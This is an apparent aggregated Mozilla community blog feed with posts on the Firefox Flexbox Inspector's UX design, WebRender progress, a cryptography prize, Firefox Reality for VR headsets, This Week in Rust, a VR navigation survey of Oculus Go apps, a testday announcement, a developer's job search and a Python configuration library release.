The UX challenges of this tool have been both frustrating and a lot of fun for our team. Built on the basic concepts of the CSS Grid Inspector, we sought to expand on the possibilities of what a design tool could be. I’m excited to share a behind-the-scenes look at the UX patterns and processes that drove our design forward.

Research and ideation

CSS Flexbox is an increasingly popular layout model that helps in building robust dynamic page layouts. However, it has a big learning curve—at the beginning of this project, our team wasn’t sure if we understood Flexbox ourselves, and we didn’t know what the main challenges were. So, we gathered data to help us design the basic feature set.

Our earliest research on design-focused tools included interviews with developer/designer friends and community members who told us they wanted to understand Flexbox better.

We also ran a survey to rank the Flexbox features folks most wanted to see. Min/max width and height constraints received the highest score. The ranking of shrink/grow features was also higher than we expected. This greatly influenced our plans, as we had originally assumed these more complicated features could wait for a version 2.0. It was clear however that these were the details developers needed most.

Flexbox survey results

Most of the early design work took the form of spirited brainstorming sessions in video chat, text chat, and email. We also consulted the experts: Daniel Holbert, our Gecko engine developer who implemented the Flexbox spec for Firefox; Dave Geddes, CSS educator and creator of the Flexbox Zombies course; and Jen Simmons, web standards champion and designer of the Grid Inspector.

The discussions with friendly and passionate colleagues were among the best parts of working on this project. We were able to deep-dive into the meaty questions, the nitty-gritty details, and the far-flung ideas about what could be possible. As a designer, it is amazing to work with developers and product managers who care so much about the design process and have so many great UX ideas.

Visualizing a new layout model

After our info-gathering, we worked to build our own mental models of Flexbox.

While trying to learn Flexbox myself, I drew diagrams that show its different features.

Early Flexbox diagram

My colleague Gabriel created a working prototype of a Flexbox highlighter that greatly influenced our first launch version of the overlay. It’s a monochrome design similar to our Grid Inspector overlay, with a customizable highlight color to make it clearly visible on any website.

We use a dotted outline for the container, solid outlines for items, and diagonal shading between the items to represent the free space created by justify-content and margins.

NYTimes header with Flexbox overlay

Youtube header with Flexbox overlay

We got more adventurous with the Flexbox pane inside DevTools. The flex item diagram (or “minimap” as we love to call it) shows a visualization of basis, shrink/grow, min/max clamping, and the final size—each attribute appearing only if it’s relevant to the layout engine’s sizing decisions.

Flex item diagram

Many other design ideas, such as these flex container diagrams, didn’t make it into the final MVP, but they helped us think through the options and may get incorporated later.

Early container diagram design

Color-coded secrets of the rendering engine

With help from our Gecko engineers, we were able to display a chart with step-by-step descriptions of how a flex item’s size is determined. Basic color-coding between the diagram and chart helps to connect the two UIs.

Flex item sizing steps

Markup badges and other entry points

Flex badges in the markup view serve as indicators of flex containers as well as shortcuts for turning on the in-page overlay. Early data shows that this is the most common way to turn on the overlay; the toggle switch in the Layout panel and the button next to the display:flex declaration in Rules are two other commonly used methods. Having multiple entry points accommodates different workflows, which may focus on any one of the three Inspector panels.

Flex badges in the markup view

Surfacing a brand new tool

Building new tools can be risky due to the presumption of modifying developers’ everyday workflows. One of my big fears was that we’d spend countless hours on a new feature only to hide it away somewhere inside the complicated megaplex that is Firefox Developer Tools. This could result in people never finding it or not bothering to navigate to it.

To invite usage, we automatically show Flexbox info in the Layout panel whenever a developer selects a flex container or item inside the markup view. The Layout panel will usually be visible by default in the third Inspector column which we added in Firefox 62. From there, the developer can choose to dig deeper into flex visualizations and relationships.

Showing the Flexbox info automatically when selecting a Flex element

Mobile-inspired navigation & structure

One new thing we’re trying is a page-style navigation in which the developer goes “forward a page” to traverse down the tree (to child elements), or “back a page” to go up the tree (to parent elements). We’re also making use of a select menu for jumping between sibling flex items. Inspired by mobile interfaces, the Firefox hamburger menu, and other page-style UIs, it’s a big experimental departure from the simpler navigation normally used in DevTools.

Page-like navigation

One of the trickier parts of the structure was coming up with a cohesive design for flex containers, items, and nested container-items. My colleague Patrick figured out that we should have two types of flex panes inside the Layout panel, showing whichever is relevant: an Item pane or a Container pane. Both panes show up when the element is both a container and an item.

Layout panel showing flex container and item info

Tighter connection with in-page context

When hovering over element names inside the Flexbox panes, we highlight the element in the page, strengthening the connection between the code and the output without including extra ‘inspect’ icons or other steps. I plan to introduce more of this type of intuitive hover behavior into other parts of DevTools.

Hovering over a flex item name which triggers a highlight in the page

Testing and development

After lots of iteration, I created a high-fidelity prototype to share with our community channels. We received lots of helpful comments that fed back into the design.

Different screens in the Flexbox Inspector prototype

We had our first foray into formal user testing, which was helpful in revealing the confusing parts of our tool. We plan to continue improving our user research process for all new projects.

User testing video

UserTesting asks participants to record their screens and think aloud as they try out software

Later this month, developers from our team will be writing a more technical deep-dive about the Flexbox Inspector. Meanwhile, here are some fun tidbits from the dev process: Lots and lots of issues were created in Bugzilla to organize every implementation task of the project. Silly test pages, like this one, created by my colleague Mike, were made to test out every Flexbox situation. Our team regularly used the tool in Firefox Nightly with various sites to dog-food the tool and find bugs.

What’s next

2018 was a big year for Firefox DevTools and the new Design Tools initiative. There were hard-earned lessons and times of doubt, but in the end, we came together as a team and we shipped!

We have more work to do in improving our UX processes, stepping up our research capabilities, and understanding the results of our decisions. We have more tools to build—better debugging tools for all types of CSS layouts and smoother workflows for CSS development. There’s a lot more we can do to improve the Flexbox Inspector, but it’s time for us to put it out into the world and see if we can validate what we’ve already built.

Now we need your help. It’s critical that the Flexbox Inspector gets feedback from real-world usage. Give it a spin in DevEdition, and let us know via Twitter or Discourse if you run into any bugs, ideas, or big wins.

____

Thanks to Martin Balfanz, Daniel Holbert, Patrick Brosset, and Jordan Witte for reviewing drafts of this article.

The post Designing the Flexbox Inspector appeared first on Mozilla Hacks - the Web developer blog.

Mozilla GFXWebRender newsletter #35

Bonsoir! Another week, another newsletter. I stealthily published WebRender on crates.io this week. This doesn’t mean anything in terms of API stability and whatnot, but it makes it easier for people to use WebRender in their own rust projects. Many asked for it so there it is. Everyone is welcome to use it, find bugs, report them, submit fixes and improvements even!

In other news we are initiating a notable workflow change: WebRender patches will land directly in Firefox’s mozilla-central repository and a bot will automatically mirror them on github. This change mostly affects the gfx team. What it means for us is that testing webrender changes becomes a lot easier as we don’t have to manually import every single work in progress commit to test it against Firefox’s CI anymore. Also Kats won’t have to spend a considerable amount of his time porting WebRender changes to mozilla-central anymore.
We know that interacting with mozilla-central can be intimidating for external contributors so we’ll still accept pull requests on the github repository although instead of merging them from there, someone in the gfx team will import them in mozilla-central manually (which we already had to do for non-trivial patches to run them against CI before merging). So for anyone who doesn’t work everyday on WebRender this workflow change is pretty much cosmetic. You are still welcome to keep following and interacting with the github repository.

Notable WebRender and Gecko changes

  • Jeff fixed a recent regression that was causing blob images to be painted twice.
  • Kats the work to make the repository transition possible without losing any of the tools and testing we have in WebRender. He also set up the repository synchronization.
  • Kvark completed the clipping API saga.
  • Matt added some new telemetry for paint times, that take vsync into account.
  • Matt fixed a bug with a telemetry probe that was mixing content and UI paint times.
  • Andrew fixed an image flickering issue.
  • Andrew fixed a bug with image decode size and pixel snapping.
  • Lee fixed a crash in DWrite font rasterization.
  • Lee fixed a bug related to transforms and clips.
  • Emilio fixed a bug with clip path and nested clips.
  • Glenn fixed caching fixed position clips.
  • Glenn improved the cached tile eviction heuristics (2).
  • Glenn fixed an intermittent test failure.
  • Glenn fixed caching with opacity bindings that are values.
  • Glenn avoided caching tiles that always change.
  • Glenn fixed a cache eviction issue.
  • Glenn added a debugging overlay for picture caching.
  • Nical reduced the overdraw when rendering dashed corners, which was causing freezes in extreme cases.
  • Nical added the possibility to run wrench/scripts/headless.py (which lets us run CI under os-mesa) inside gdb, cgdb, rust-gdb and rr both with release and debug builds (see Debugging WebRender on wiki for more info about how to set this up).
  • Nical fixed a blob image key leak.
  • Sotaro fixed the timing of async animation deletion which addressed bug 1497852 and bug 1505363.
  • Sotaro fixed a cache invalidation issue when the number of blob rasterization requests hits the per-transaction limit.
  • Doug cleaned up WebRenderLayaerManager’s state management.
  • Doug fixed a lot of issues in WebRender when using multiple documents at the same time.

Ongoing work

The team keeps going through the remaining blockers (19 P2 bugs and 34 P3 bugs at the time of writing).

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Mozilla BlogEric Rescorla Wins the Levchin Prize at the 2019 Real-World Crypto Conference

The Levchin Prize awards two entrepreneurs every year for significant contributions to solving global, real-world cryptography issues that make the internet safer at scale. This year, we’re proud to announce that our very own Firefox CTO, Eric Rescorla, was awarded one of these prizes for his involvement in spearheading the latest version of Transport Layer Security (TLS). TLS 1.3 incorporates significant improvements in both security and speed, and was completed in August and already secures 10% of sites.

Eric has contributed extensively to many of the core security protocols used in the internet, including TLS, DTLS, WebRTC, ACME, and the in development IETF QUIC protocol.  Most recently, he was editor of TLS 1.3, which already secures 10% of websites despite having been finished for less than six months. He also co-founded Let’s Encrypt, a free and automated certificate authority that now issues more than a million certificates a day, in order to remove barriers to online encryption and helped HTTPS grow from around 30% of the web to around 75%. Previously, he served on the California Secretary of State’s Top To Bottom Review where he was part of a team that found severe vulnerabilities in multiple electronic voting devices.

The 2019 winners were selected by the Real-World Cryptography conference steering committee, which includes professors from Stanford University, University of Edinburgh, Microsoft Research, Royal Holloway University of London, Cornell Tech, University of Florida, University of Bristol, and NEC Research.

This prize was announced on January 9th at the 2019 Real-World Crypto Conference in San Jose, California. The conference brings together cryptography researchers and developers who are implementing cryptography on the internet, the cloud and embedded devices from around the world. The conference is organized by the International Association of Cryptologic Research (IACR) to strengthen and advance the conversation between these two communities.

For more information about the Levchin Prize visit www.levchinprize.com.

The post Eric Rescorla Wins the Levchin Prize at the 2019 Real-World Crypto Conference appeared first on The Mozilla Blog.

Mozilla Open Policy & Advocacy BlogOur Letter to Congress About Facebook Data Sharing

Last week Mozilla sent a letter to the House Energy and Commerce Committee concerning its investigation into Facebook’s privacy practices. We believe Facebook’s representations to the Committee — and more recently — concerning Mozilla are inaccurate and wanted to set the record straight about any past and current work with Facebook. You can read the full letter here.

The post Our Letter to Congress About Facebook Data Sharing appeared first on Open Policy & Advocacy.

The Mozilla BlogMozilla Announces Deal to Bring Firefox Reality to HTC VIVE Devices

Last year, Mozilla set out to build a best-in-class browser that was made specifically for immersive browsing. The result was Firefox Reality, a browser designed from the ground up to work on virtual reality headsets. To kick off 2019, we are happy to announce that we are partnering with HTC VIVE to power immersive web experiences across Vive’s portfolio of devices.

What does this mean? It means that Vive users will enjoy all of the benefits of Firefox Reality (such as its speed, power, and privacy features) every time they open the Vive internet browser. We are also excited to bring our feed of immersive web experiences to every Vive user. There are so many amazing creators out there, and we are continually impressed by what they are building.

“This year, Vive has set out to bring everyday computing tasks into VR for the first time,” said Michael Almeraris, Vice President, HTC Vive. “Through our exciting and innovative collaboration with Mozilla, we’re closing the gap in XR computing, empowering Vive users to get more content in their headset, while enabling developers to quickly create content for consumers.”

Virtual reality is one example of how web browsing is evolving beyond our desktop and mobile screens. Here at Mozilla, we are working hard to ensure these new platforms can deliver browsing experiences that provide users with the level of privacy, ease-of-use, and control that they have come to expect from Firefox.

In the few months since we released Firefox Reality, we have already released several new features and improvements based on the feedback we’ve received from our users and content creators. In 2019, you will see us continue to prove our commitment to this product and our users with every update we provide.

Stay tuned to our mixed reality blog and twitter account for more details. In the meantime, you can check out all of the announcements from HTC Vive here.

If you have an all-in-one VR device running Vive Wave, you can search for “Firefox Reality” in the Viveport store to try it out right now.

The post Mozilla Announces Deal to Bring Firefox Reality to HTC VIVE Devices appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 268

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is gfx-hal, a hardware abstraction layer for gfx-rs. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

166 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The name Rust suggests what it is: a thin layer on top of the metal.

– c3534l on reddit

Thanks to Cauê Baasch De Souza for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Mozilla VR BlogNavigation Study for 3DoF Devices

Navigation Study for 3DoF Devices

Over the past few months I’ve been building VR demos and writing tutorial blogs. Navigation on a device with only three degrees of freedom (3dof) is tricky, So I decided to do a survey of many native apps and games for the Oculus Go to see how each of them handled it. Below are my results.

For this study I looked only at navigation, meaning how the user moves around in the space, either by directly moving or by jumping to semantically different spaces (ex: click a door to go to the next room). I don't cover other interactions like how buttons or sliders work. Just navigation.

TL;DR

Don’t touch the camera. The camera is part of the users head. Don’t try to move it. All apps which move the camera induce some form of motion sickness. Instead use one of a few different forms of teleportation, always under user control.

The ideal control for me was teleportation to semantically meaningful locations, not just 'forward ten steps'. Further more, when presenting the user with a full 360 environment it is helpful to have a way to recenter the view, such as by using left/right buttons on the controller. Without a recentering option the user will have to physically turn themselves around, which is cumbersome unless you are in a swivel chair.

To help complete the illusion I suggest subtle sound effects for movement, selection, and recentering. Just make sure they aren't very noticable.

Epic Roller Coaster

This is a roller coaster simulator, except it lets you do things that a real rollercoaster can’t, such as jumping between tracks and being chased by dinosaurs. To start you have pointer interaction across three panels: left, center, right. Everything has hover/rollover effects with sound. During the actual rollercoaster ride you are literally a camera on rails. Press the trigger to start and then the camera moves at constant speed. All you can do is look around. Speed and angle changes made me dizzy and I had to take it off after about five minutes, but my 7 year old loves Epic Roller Coaster.

Space Time

A PBS app that teaches you about black holes, the speed of light, and other physics concepts. You use pointer interaction to click buttons then watch non-interactive 3D scenes/info, though they are in full 360 3D, rather than plain movies.

Within Videos

A collection of many 360 and 3D movies. Pointer interaction to pick videos, some scrolling w/ touch gestures. Then non-interactive videos except for the video controls.

Master Work Journeys

Explorer famous monuments and locations like Mount Rushmore. You can navigate around 360 videos by clicking on hotspots with the pointer. Some trigger photos or audio. Others are teleportation spots. There is no free navigation or free teleportation, only to the hotspots. You can adjust the camera with left and right swipes, though.

Thumper

An intense driving and tilting music game. It uses pointer control for menus. In the game you run at a constant speed. The track itself turns but you are always stable in the middle. Particle effects stream at you, reinforcing the illusion of the tube you are in.

Bait

A fishing simulator. You use pointer clicks for navigation in the menus. The main interaction is a fishing pole. Hold then release button at the right time while flicking the pole forward to cast, then click to reel it back in.

Dinosaurs

Basically like the rollercoaster game, but you learn about various dinosaurs by driving on a constant speed rails car to different scenes. It felt better to me than Epic Roller Coaster because the velocity is constant, rather than changing.

Breaking Boundaries in Science

Text overlays with audio and 360 background image. You can navigate through full 3D space by jumping to hard coded teleport spots. You can click certain spots to get to these points, hear audio, and lightly interact with artifacts. If you look up at an angle you see a flip-180 button to change the view. This avoids the problem of having to be in a 360 chair to navigate around. You cannot camera adjust with left/right swipes.

WonderGlade

In every scene you float over a static mini-landscape, sort of like you are above a game board. You cannot adjust the angle or camera, just move your head to see stuff. Everything laid around you for easy viewing from the fixed camera point. Individual mini games may use different mechanics for playing, but they are all using the same camera. Essentially the camera and world never move. You can navigate your player character around the board by clicking on spots, similar to an RTS like Starcraft.

Starchart

Menus are a static camera view with mouse interaction. Once inside of a star field you are at the center and can look in any direction of the virtual night sky. Swipe left / right to move camera 45 degrees, which happens instantly, not with navigation, though there are sound effects.
Click on a star or other object in the sky to get more info. The info appears attached to your controller. Rotate thumb in a on the touch area to get different info on the object. The info has a model of the object, either a full 3d model of a star / planet, or a 2d image of a galaxy, etc.

Lila’s Tail

Mouse menu interaction. In-game the level is a maze mapped onto a cylinder surrounding you. You click to guide Lila through the maze, sometimes she must slide from one side across the center to the other side. You guide her and the spotlight with your gaze. You activate things by connecting dots with the pointer. There is no way I can see to adjust the camera. This is a bit annoying in the levels which require you to navigate a full 360 degrees. I really wish it had recentering.

Overworld Underlord

A mini RTS / tower defense game. The camera is at a fixed position above the board. The boards are designed to lay around the camera, so you turn left or right to see the whole board. Control your units by clicking on them then clicking a destination.

Claro

A puzzle game where you lightly move things around to complete a sun light reflecting mechanism. The camera is fixed and the board is always an object in front of you. You rotate the board with left / right swipes on the touchpad. You move the sun by holding the trigger and moving the pointer around. Menus use mouse cursor navigation. The board is always in front of you but extra info like the level you are on and your score are to the left or right of you. Interestingly these are positioned far enough to the sides that you won't see the extra info while solving a puzzle. Very nice. You are surrounded by a pretty sky box that changes colors as the sun moves.

Weaver

Weaver is 360 photo viewer using a gaze cursor to navigate. Within the photos you cannot move them, just rotate your head. If you look down a floating menu appears to go to the next photo or main menu.

Ocean Rift

This is a nice underwater simulation of a coral reef. Use the pointer for menus and navigate around undersea with controller. The camera moves fairly slowly but does have some acceleration which made me a little sick. No camera rotation or recentering, just turn your head.

Fancy Beats

Rhythm game. Lights on the game board make it look like you are moving forward w/ your bowling ball, or that the board is moving backward. Either way it’s at a constant speed. Use touchpad interactions to control your ball to the beat.

Endspace

In Endspae you fly a space fighter into battle. There is a static cockpit around you and it uses head direction to move the camera around. The controller is used to aim the weapon. I could only handle this for about 60 seconds before I started to feel sick. Basically everything is moving around you constantly in all directions, so I immediately started to feel floaty.

Lands End

You navigate by jumping to teleportation spots using a gaze cursor. When you teleport the camera moves to the new spot at a constant velocity. Because movement is slow and the horizon is level I didn’t get too queasy, but still not as great as instant teleport. On the other hand, instant teleport might make it hard to know where you just moved to. Losing spatial context would be bad in this game. You can rotate your view using left and right swipes.

Jurassic World Blue

This is a high resolution 360 movie following a dinosaur from the newest Jurassic Park movie. The camera is generally fixed though sometimes moves very slowly along a line to take you towards the action. I never experienced any dizziness from the movement.

Dark Corner

Spooky short films in full 360. In the one I watched, The Office, the camera did not move at all, though things did sometimes come from angles away from where they knew the viewer would be looking. This is a very clever way to do jump scares without controlling the camera.

Maze VR Ultimate Pathfinding

You wander around a maze trying to find the exit. I found the control scheme awkward. You walk forward in whatever direction you gaze in for more than a moment, or when you press a button on the controller. The direction is always controlled by your gaze, however. The movement speed goes from stationary to full speed over a second or so. I would have preferred to not have the ramp up time. Also, you can’t click left or right on the controller trackpad to shift the view. I’m guessing this was originally for cardboard or similar devices.

Dead Shot

A Zombie shooter. The Oculus Store has several of these. Dead Shot has both a comfort mode and regular mode. In regular mode the camera does move, but at a slow and steady pace that didn’t give me any sickness. In comfort mode the camera never moves. Instead it teleports to the new location, including a little eyeblink animation for the transition. Nicely done! To make sure you don’t get lost it only teleports to near by locations you can see.

Pet Lab

A creature creation game. While there are several rooms all interaction happens from fixed positions where you look around you. You travel to various rooms by pointing and clicking on the door that you want to go to.

Dead and Buried

Shoot ghosts in an old west town. You don’t move at all in this game. You always shoot from fixed camera locations, simliar to a carnival game.

Witchblood

This is actually a side scroller with a set that looks like little dollhouses that you view from the side. I’d say it was cute except that there’s monsters anywhere. In any case, you don’t move the camera at all except to look from one end of a level to another.

Affected : The Manor

A game where you walk around a haunted house. The control scheme is interesting. You use the trigger on the controller to move forward, however the direction is controlled by your head view. The direction of the controller is used for your flashlight. I think it would be better if it was reversed. Use the controller direction for movement and your head for the flashlight. Perhaps there’s a point later in the game where their decision matters. I did notice that the speed is constant. You seem to be moving or not. I didn’t experience any discomfort.

Tomb Raider: Laura’s Escape

This is a little puzzle adventure game that takes you to the movie’s trailer. For being essentially advertising it was surprisingly good. You navigate by pointing at and clicking on glowing lights that are trigger points. These then move you toward that spot. The movement is at a constant speed but here is a slight slowdown when you reach the trigger point instead of immediately stopping. I felt a slight tinge of sickness but not much. In other parts of the game you climb by pointing and clicking on hand holds on a wall. I like how they used the same mechanic in different ways.

Dreadhalls

A literal dungeon crawler where you walk through dark halls looking for clues to find the way out. This game uses the trigger to collect things and the forward button on the touchpad to move forward. It uses the direction of the controller for movement rather than head direction. This means you can move sideways. It also means you can smoothly move around twisty halls if you are sitting in a swivel chair. I like it more than the way Affected does it.

World of Wonders

This game lets you visit various ancient wonders and wander around as citizens. You navigate by teleporting to wherever you point at. You can swipe left or right on the touchpad to rotate your view, though I found it a bit twitchy. Judging from the in game tutorial World of Wonders was designed original for the Gear VR so perhaps it’s not calibrated for the Oculus Go.

Short distance teleporting is fine for when you are walking around a scene, but to get between scenes you click on the sky to bring up a map which then lets you jump to the other scenes. Within a scene you can also click on various items to learn more about them.

One interesting interaction is that sometimes characters in the scenes will talk to you and ask you questions. You can respond yes or now by nodding or shaking your head. I don’t think I’ve ever seen that in a game before. Interestingly, nods and shakes are not universal. Different cultures use these gestures differently.

Rise of the Fallen

A fighting game where you slash at enemies. It doesn’t appear that you move at all, just that enemies attack you and you attack back with melee weapons.

Vendetta Online VR

Spaceship piloting game. This seems to be primarily a mullti-player game but I did the single player training levels to learn how to navigate. All action takes place in the cockpit of a spaceship. You navigate by targeting where you want to go and tilting your head. Once you have picked a target you press turbo to go their quickly. Oddly the star field is fixed while the cockpit floats around you. I think this means that if I wanted to go backwards I’d have to completely rotate myself around. Better have a swivel chair!

Smash Hit

A game where you smash glass things. The camera is on rails moving quickly straight forward. I was slightly dizzy at first because of the speed but quickly got used to it. You press the trigger to fire at the direction your head is pointing. It doesn’t use the controller orientation. I’m guessing this is a game originally designed for Cardboard? The smashing of objects is satisfying and there are interesting challenges as further levels have more and more stuff to smash. There is no actual navigation because you are on rails.

Apollo 11 VR

A simulation of the moon landing with additional information about the Apollo missions. Mostly this consists of watching video clips or cinematics, which are when the camera is moved around a scene, such as going up the elevator of the Saturn V rocket. In a few places you can control something, such as docking the spaceship to the LEM. The cinematics are good, especially for a device as limited graphically as the Go, but I did get a twinge of dizziness whenever the camera accelerated or de-celerated. Largely are you are in a fixed position with zero interaction.

QMOFirefox 65 Beta 10 Testday, January 11th

Hello Mozillians,

We are happy to let you know that Friday, January 11th, we are organizing Firefox 65 Beta 10 Testday. We’ll be focusing our testing on:  Firefox Monitor, Content Blocking and Find Toolbar. 

Check out the detailed instructions via this etherpad.

No previous testing experience is required, so feel free to join us on #qa IRC channel where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Gregory SzorcSeeking Employment

After almost seven and a half years as an employee of Mozilla Corporation, I'm moving on. I have already worked my final day as an employee.

This post is the first time that I've publicly acknowledged my departure. To any Mozillians reading this, I regret that I did not send out a farewell email before I left. But the circumstances of my departure weren't conducive to doing so. I've been drafting a proper farewell blog post. But it has been very challenging to compose. Furthermore, each passing day brings with it new insights into my time at Mozilla and a new wrinkle to integrate into the reflective story I want to tell in that post. I vow to eventually publish a proper goodbye that serves as the bookend to my employment at Mozilla. Until then, just let me say that I'm already missing working with many of you. I've connected with several people since I left and still owe responses or messages to many more. If you want to get in touch, my contact info is in my résumé.

I left Mozilla without new employment lined up. That leads me to the subject line of this post: I'm seeking employment. The remainder of this post is thus tailored to potential employers.

My résumé has been updated. But that two page summary only scratches the surface of my experience and set of skills. The Body of Work page of my website is a more detailed record of the work I've done. But even it is not complete!

Perusing through my posts on this blog will reveal even more about the work I've done and how I go about it. My résumé links to a few posts that I think are great examples of the level of understanding and detail that I'm capable of harnessing.

As far as the kind of work I want to do or the type of company I want to work for, I'm trying to keep an open mind. But I do have some biases.

I prefer established companies to early start-ups for various reasons. Dan Luu's Big companies v. startups is aligned pretty well with my thinking.

One of the reasons I worked for Mozilla was because of my personal alignment with the Mozilla Manifesto. So I gravitate towards employers that share those principles and am somewhat turned off by those that counteract them. But I recognize that the world is complex and that competing perspectives aren't intrinsically evil. In other words, I try to maintain an open mind.

I'm attracted to employers that align their business with improving the well-being of the planet, especially the people on it. The link between the business and well-being can be tenuous: a B2B business for example is presumably selling something that helps people, and that helping is what matters to me. The tighter the link between the business and improving the world will increase my attraction to a employer.

I started my university education as a biomedical engineer because I liked the idea of being at the intersection of technology and medicine. And part of me really wants to return to this space because there are few things more noble than helping a fellow human being in need.

As for the kind of role or technical work I want to do, I could go in any number of directions. I still enjoy doing individual contributor type work and believe I could be an asset to an employer doing that work. But I also crave working on a team, performing technical mentorship, and being a leader of technical components. I enjoy participating in high-level planning as well as implementing the low-level aspects. I recognize that while my individual output can be substantial (I can provide data showing that I was one of the most prolific technical contributors at Mozilla during my time there) I can be more valuable to an employer when I bestow skills and knowledge unto others through teaching, mentorship, setting an example, etc.

I have what I would consider expertise in a few domains that may be attractive to employers.

I was a technical maintainer of Firefox's build system and initiated a transition away from an architecture that had been in place since the Netscape days. I definitely geek out way too much on build systems.

I am a contributor to the Mercurial version control tool. I know way too much about the internals of Mercurial, Git, and other version control tools. I am intimately aware of scaling problems with these tools. Some of the scaling work I did for Mercurial saved Mozilla tens of thousands of dollars in direct operational costs and probably hundreds of thousands of dollars in saved people time due to fewer service disruptions and faster operations.

I have exposure to both client and server side work and the problems encountered within each domain. I've dabbled in lots of technologies, operating systems, and tools. I'm not afraid to learn something new. Although as my experience increases, so does my skepticism of shiny new things (I've been burned by technical fads too many times).

I have a keen fascination with optimization and scaling, whether it be on a technical level or in terms of workflows and human behavior. I like to ask and then what so I'm thinking a few steps out and am prepared for the next problem or consequence of an immediate action.

I seem to have a knack for caring about user experience and interfaces. (Although my own visual design skills aren't the greatest - see my website design for proof.) I'm pretty passionate that tools that people use should be simple and usable. Cognitive dissonance, latency, and distractions are real and as an industry we don't do a great job minimizing these disruptions so focus and productivity can be maximized. I'm not saying I would be a good product manager or UI designer. But it's something I've thought about because not many engineers seem to exhibit the passion for good user experience that I do and that intersection of skills could be valuable.

My favorite time at Mozilla was when I was working on a unified engineering productivity team. The team controlled most of the tools and infrastructure that Firefox developers interacted with in order to do their jobs. I absolutely loved taking a whole-world view of that problem space and identifying the high-level problems - and low-hanging fruit - to improve the overall Firefox development experience. I derived a lot of satisfaction from identifying pain points, equating them to a dollar cost by extrapolating people time wasted due to them, justifying working on them, and finally celebrating - along with the overall engineering team - when improvements were made. I think I would be a tremendous asset to a company working in this space. And if my experience at Mozilla is any indicator, I would more than offset my total employment cost by doing this kind of work.

I've been entertaining the idea of contracting for a while before I resume full-time employment with a single employer. However, I've never contracted before and need to do some homework before I commit to that. (Please leave a comment or email me if you have recommendations on reading material.)

My dream contract gig would likely be to finish the Mercurial wire protocol and storage work I started last year. I would need to type up a formal proposal, but the gist of it is the work I started has the potential to leapfrog Git in terms of both client-side and server-side performance and scalability. Mercurial would be able to open Git repositories on the local filesystem as well as consume them via the Git wire protocol. Transparent Git interoperability would enable Mercurial to be used as a drop-in replacement for Git, which would benefit users who don't have control over the server (such as projects that live on GitHub). Mercurial's new wire protocol is designed with global scalability and distribution in mind. The goal is to enable server operators to deploy scalable VCS servers in a turn-key manner by relying on scalable key-value stores and content distribution networks as much as possible (Mercurial and Git today require servers to perform way too much work and aren't designed with modern distributed systems best practices, which is why scaling them is hard). The new protocol is being designed such that a Mercurial server could expose Git data. It would then be possible to teach a Git client to speak the Mercurial wire protocol, which would result in Mercurial being a more scalable Git server than Git is today. If my vision is achieved, this would make server-side VCS scaling problems go away and would eliminate the religious debate between Git and Mercurial (the answer would be deploy a Mercurial server, allow data to be exposed to Git, and let consumers choose). I conservatively estimate that the benefits to industry would be in the millions of dollars. How I would structure a contract to deliver aspects of this, I'm not sure. But if you are willing to invest six figures towards this bet, let's talk. A good foundation of this work is already implemented in Mercurial and the Mercurial core development team is already on-board with many aspects of the vision, so I'm not spewing vapor.

Another potential contract opportunity would be funding PyOxidizer. I started the project a few months back as a side-project as an excuse to learn Rust while solving a fun problem that I thought needed solving. I was hoping for the project to be useful for Mercurial and Mozilla one day. But if social media activity is any indication, there seems to be somewhat widespread interest in this project. I have no doubt that once complete, companies will be using PyOxidizer to ship products that generate revenue and that PyOxidizer will save them engineering resources. I'd very much like to recapture some of that value into my pockets, if possible. Again, I'm somewhat naive about how to write contracts since I've never contracted, but I imagine deliver a tool that allows me to ship product X as a standalone binary to platforms Y and Z is definitely something that could be structured as a contract.

As for the timeline, I was at Mozilla for what feels like an eternity in Silicon Valley. And Mozilla's way of working is substantially different from many companies. I need some time to decompress and unlearn some Mozilla habits. My future employer will inherit a happier and more productive employee by allowing me to take some much-needed time off.

I'm looking to resume full-time work no sooner than March 1. I'd like to figure out what the next step in my career is by the end of January. Then I can sign some papers, pack up my skiis, and become a ski bum for the month of February: if I don't use this unemployment opportunity to have at least 20 days on the slopes this season and visit some new mountains, I will be very disappointed in myself!

If you want to get in touch, my contact info is in my résumé. I tend not to answer incoming calls from unknown numbers, so email is preferred. But if you leave a voicemail, I'll try to get back to you.

I look forward to working for a great engineering organization in the near future!

Will Kahn-GreeneEverett v1.0.0 released!

What is it?

Everett is a configuration library for Python apps.

Goals of Everett:

  1. flexible configuration from multiple configured environments
  2. easy testing with configuration
  3. easy documentation of configuration for users

From that, Everett has the following features:

  • is composeable and flexible
  • makes it easier to provide helpful error messages for users trying to configure your software
  • supports auto-documentation of configuration with a Sphinx autocomponent directive
  • has an API for testing configuration variations in your tests
  • can pull configuration from a variety of specified sources (environment, INI files, YAML files, dict, write-your-own)
  • supports parsing values (bool, int, lists of things, classes, write-your-own)
  • supports key namespaces
  • supports component architectures
  • works with whatever you're writing--command line tools, web sites, system daemons, etc

v1.0.0 released!

This release fixes many sharp edges, adds a YAML configuration environment, and fixes Everett so that it has no dependencies unless you want to use YAML or INI.

